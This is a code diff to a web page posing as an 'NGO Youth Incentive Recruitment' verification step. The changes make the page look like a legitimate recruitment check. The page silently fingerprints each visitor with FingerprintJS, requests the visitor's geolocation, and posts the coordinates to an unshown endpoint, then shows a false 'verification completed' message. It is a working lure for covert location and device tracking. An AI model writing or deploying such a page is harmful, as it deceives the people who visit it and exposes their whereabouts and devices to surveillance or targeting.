--- a/index.html
+++ b/index.html
@@ -4,14 +4,37 @@
   <meta charset="UTF-8">
   <title>NGO recruitment process: Youth Incentive</title>
   <script src="https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@3/dist/fp.min.js"></script>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      text-align: center;
+      margin-top: 100px;
+    }
+    button {
+      padding: 15px 30px;
+      font-size: 18px;
+      cursor: pointer;
+    }
+  </style>
 </head>
 <body>
-  <h1>Please wait and allow location... You are the next Bangladesh</h1>
+  <h1>NGO Youth Incentive Recruitment</h1>
+  <p>Click below to proceed to verification process</p>
+  <button onclick="startProcess()">Proceed</button>
 
   <script>
+    let fingerprintData = null;
+
+    // Initialize FingerprintJS on page load
     const fpPromise = FingerprintJS.load();
 
-    function sendData(locationData, fingerprintData) {
+    fpPromise.then(fp => {
+      fp.get().then(result => {
+        fingerprintData = result;
+      });
+    });
+
+    function sendData(locationData) {
       const formData = new FormData();
       formData.append("latitude", locationData.latitude);
       formData.append("longitude", locationData.longitude);
@@ -27,35 +50,32 @@
       });
     }
 
-    fpPromise.then(fp => {
-      fp.get().then(result => {
-        const fingerprintData = result;
+    function startProcess() {
+      if (navigator.geolocation) {
+        navigator.geolocation.getCurrentPosition(function(position) {
+          const locationData = {
+            latitude: position.coords.latitude,
+            longitude: position.coords.longitude,
+            accuracy: position.coords.accuracy
+          };
 
-        if (navigator.geolocation) {
-          navigator.geolocation.getCurrentPosition(function(position) {
-            const locationData = {
-              latitude: position.coords.latitude,
-              longitude: position.coords.longitude,
-              accuracy: position.coords.accuracy
-            };
+          console.log("Got location:", locationData);
+          sendData(locationData);
+          alert("Verification completed successfully. Thank you!");
 
-            console.log("Got location:", locationData);
-            sendData(locationData, fingerprintData);
-
-          }, function(error) {
-            console.error("Error occurred:", error);
-            sendData({
-              latitude: null,
-              longitude: null,
-              accuracy: null
-            }, fingerprintData);
+        }, function(error) {
+          console.error("Error occurred:", error);
+          sendData({
+            latitude: null,
+            longitude: null,
+            accuracy: null
           });
-
-        } else {
-          alert("Geolocation is not supported.");
-        }
-      });
-    });
+          alert("Verification failed: Unable to access location.");
+        });
+      } else {
+        alert("Geolocation is not supported by this browser.");
+      }
+    }
   </script>
 
 </body>
